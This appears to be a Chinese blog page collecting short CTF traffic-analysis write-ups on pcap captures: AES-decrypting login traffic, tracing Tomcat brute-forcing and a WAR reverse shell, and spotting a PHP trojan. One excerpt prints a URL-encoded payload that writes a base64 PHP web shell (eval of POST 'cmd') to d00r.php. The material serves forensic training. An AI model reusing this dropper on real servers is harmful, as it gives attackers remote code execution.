lM178的博客

查看第一个流量包，有AES加密密钥是：l36DoqKUYQP0N7e1加密模式是：CBC填充方式：Pkcs7加下来找登陆成功的密文。57成功了，看第五十六个。解这个：KGM7NI0/WvKswK+PlmFIhO4gqe8jJzRdOi02GQ0wZoo=记得把from base64选上。

后门文件肯定是上传上去的，用POST请求，所以过滤这里有两个敏感的文件ViewMore.php和d00r.php这里有一串a=file_put_contents%28%27d00r.php%27%2C+base64_decode%28%27PD9waHAgZXZhbCgkX1BPU1RbJ2NtZCddKTs%2FPg%3D%3D%27%29%29%3Burl解码后是所以d00r.php是上传的，而ViewMore.php是服务器自带的，所以答案就是ViewMore.php。

统计里就 192.168.246.1和192.168.246.28活跃，整个流量包内容过少。所以我们直接顺着看就行了。第一行是192.168.246.1问内网谁有Dropbox，用来传文件的。第2-4行是广播，询问84.17.53.155，50.7.252.138，104.194.8.134的mac地址5-7行进行了握手，192.168.246.1向192.168.246.28发送了SYN请求192.168.246.28返回了SYN+ACK192.168.246.1回复了ACK。

直接过滤tcp.flags.syn==1&&tcp.flags.ack==1这是代表TCP连接真正建立了。

A 集团的⽹络安全监控系统发现恶意份⼦正在实施⾼级可持续攻击（APT），并抓取了部分可疑流 量包。请您根据捕捉到的流量包，搜寻出⽹络攻击线索，分解出隐藏的恶意程序，并分析恶意程序 的⾏为。

摘要：通过分析web.pcap数据包，发现攻击源IP为10.0.0.120。攻击者利用8080端口访问Tomcat管理面板，使用Gobuster工具枚举目录后，通过暴力破解获取了管理员凭据。成功登录后上传了恶意文件JXQOZY.war，利用自动解压特性实施反向shell攻击。整个攻击过程展示了从端口扫描、目录爆破到最终植入后门的完整APT攻击链。

通过分析网络流量发现黑客IP（172.16.1.110）对目标服务器（172.16.1.18）进行多端口暴力破解，主要针对FTP(21)、SSH(22)、Telnet(23)和MySQL(3306)端口。其中MySQL服务版本为5.7.26，黑客成功植入名为"horse"的PHP木马（连接密码lqsym），并通过木马查看了/etc/passwd文件。在Telnet交互中还发现服务器主机名为SecTestLabs，且从FTP流量中提取出一张包含英文单词的图片。

一共要用到六个文件。